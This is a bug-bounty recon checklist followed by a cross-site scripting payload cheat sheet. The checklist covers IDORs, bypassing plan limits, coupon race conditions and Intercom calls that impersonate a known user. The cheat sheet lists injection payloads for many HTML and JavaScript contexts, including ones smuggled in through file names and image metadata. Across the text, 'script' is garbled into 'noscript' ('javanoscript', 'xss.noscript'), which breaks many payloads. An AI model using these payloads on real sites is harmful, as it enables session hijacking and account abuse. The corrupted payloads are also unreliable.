- API docs/support pages. Explore functionality to understand the app better.
- Plans and pricing. Identify limitations of different plans, your goal will be detecting ways to bypass them.
- Register functionality. IDORS, unexpiring tokens, reused tokens,
- Password reset.
- 2FA.
- User Management (auth model). Try to build RBAC matrix.
- My profile section.
- User invites
- See if inviting an existing user to your org exposes their name
- See if inviting an existing user removes them from their own org
- User management
- Customer data
- Look for JS, ctrl+f and try to find /admin /api and etc.
- Look for API
- If an endpoint has api/v2/, try api/v1/
- Undocumented API Calls and Admin tools
- Upload functions
- Integration functions
- Look for subdomains, don't hack on them since they will be OOS, but try to find the way to to elavate it to your main target.
- If you find a bug that's OOS, still ask the customer if they care

Cart section
- Integer overflow
- Business logic errors (-1 number of items)
- Rate limit on coupon
- Race condition on coupon
- Any interesting parameters

Giftcards
- Any interesting parameters
- Race condition
- Reflected XSS
- API endpoint enumeration

Intercom
- Intercom('show');
- Intercom('boot',{email:'known_user@gmail.com'})

xargs -a alive.txt -I@ sh -c 'gau --blacklist css,jpg,jpeg,JPEG,ott,noscript,js,ttf,png,woff2,woff,eot,gif "@"' | tee -a gau.txt

Use when input lands inside an attribute’s value of an HTML tag or outside tag except the ones described in next case. Prepend a “-->” to payload if input lands in HTML comments.
<noscript onload=alert(1)>
"><noscript onload=alert(1)>

HTML Injection – Tag Block Breakout
Use when input lands inside or between opening/closing of the following tags:
<noscript><style><noscript><textarea><nonoscript><pre><xmp> and <iframe> (</tag> is accordingly).
</tag><noscript onload=alert(1)>
"></tag><noscript onload=alert(1)>

HTML Injection - Inline
Use when input lands inside an attribute’s value of an HTML tag but that tag can’t be terminated by greater than sign (>).
"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //

HTML Injection - Source

Use when input lands as a value of the following HTML tag attributes: href, src, data or action (also formaction). Src attribute in noscript tags can be an URL or “data:,alert(1)”.
javanoscript:alert(1)

Javanoscript Injection
Use when input lands in a noscript block, inside a string delimited value.
'-alert(1)-'
'/alert(1)//


Javanoscript Injection - Escape Bypass
Use when input lands in a noscript block, inside a string delimited value but quotes are escaped by a backslash.
\'/alert(1)//

Javanoscript Injection – Script Breakout
Use when input lands anywhere within a noscript block.
</noscript><noscript onload=alert(1)>

Javanoscript Injection - Logical Block
Use 1st or 2nd payloads when input lands in a noscript block, inside a string delimited value and inside a single logical block like function or conditional (if, else, etc). If quote is escaped with a backslash, use 3rd payload.
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//

Javanoscript Injection - Quoteless

Use when there’s multi reflection in the same line of JS code. 1st payload works in simple JS variables and 2nd one works in non-nested JS objects.
/alert(1)//\
/alert(1)}//\

Javanoscript Context - Placeholder Injection in Template LiteralUse when input lands inside backticks (``) delimited strings or in template engines.
${alert(1)}

Multi Reflection HTML Injection - Double Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
'onload=alert(1)><noscript/1='
'>alert(1)</noscript><noscript/1='
/alert(1)</noscript><noscript>/

Multi Reflection i HTML Injection - Triple Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
/alert(1)">'onload="/<noscript/1='
-alert(1)">'onload="<noscript/1='
/</noscript>'>alert(1)/<noscript/1='

Multi Input Reflections HTML Injection - Double & Triple
Use to take advantage of multiple input reflections on same page. Also useful in HPP (HTTP Parameter Pollution) scenarios, where there are reflections for repeated parameters. 3rd payload makes use of comma-separated reflections of the same parameter.
p=<noscript/1='&q='onload=alert(1)>
p=<noscript 1='&q='onload='/&r=/alert(1)'>
q=<noscript/&q=/src=data:&q=alert(1)>

Use when uploaded filename is reflected somewhere in target page.
"><noscript onload=alert(1)>.gif

Use when metadata of uploaded file is reflected somewhere in target page. It uses command-line exiftool (“$” is the terminal prompt) and any metadata field can be set.
$ exiftool -Artist='"><noscript onload=alert(1)>' xss.jpeg

Use to create a stored XSS on target when uploading image files. Save content below as
“xss.noscript”.
<noscript xmlns="http://www.w3.org/2000/noscript" onload="alert(1)"/>

Use to test for XSS when injection gets inserted into DOM as valid markup instead of being reflected in source code. It works for cases where noscript tag and other vectors won’t work.
<img src=1 onerror=alert(1)>
<iframe src=javanoscript:alert(1)>
<details open ontoggle=alert(1)>
<noscript><noscript onload=alert(1)>

Use when native javanoscript code inserts into page the results of a request to an URL that can be controlled by attacker.
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javanoscript:alert(1)>

Use when current URL is used by target’s underlying PHP code as an attribute value of an HTML form, for example. Inject between php extension and start of query part (?) using a leading slash (/).
https://brutelogic.com.br/xss.php/"><noscript onload=alert(1)>?a=reader

Use in text boxes, comment sections, etc that allows some markup input. Click to fire.
[clickme](javanoscript:alert`1`)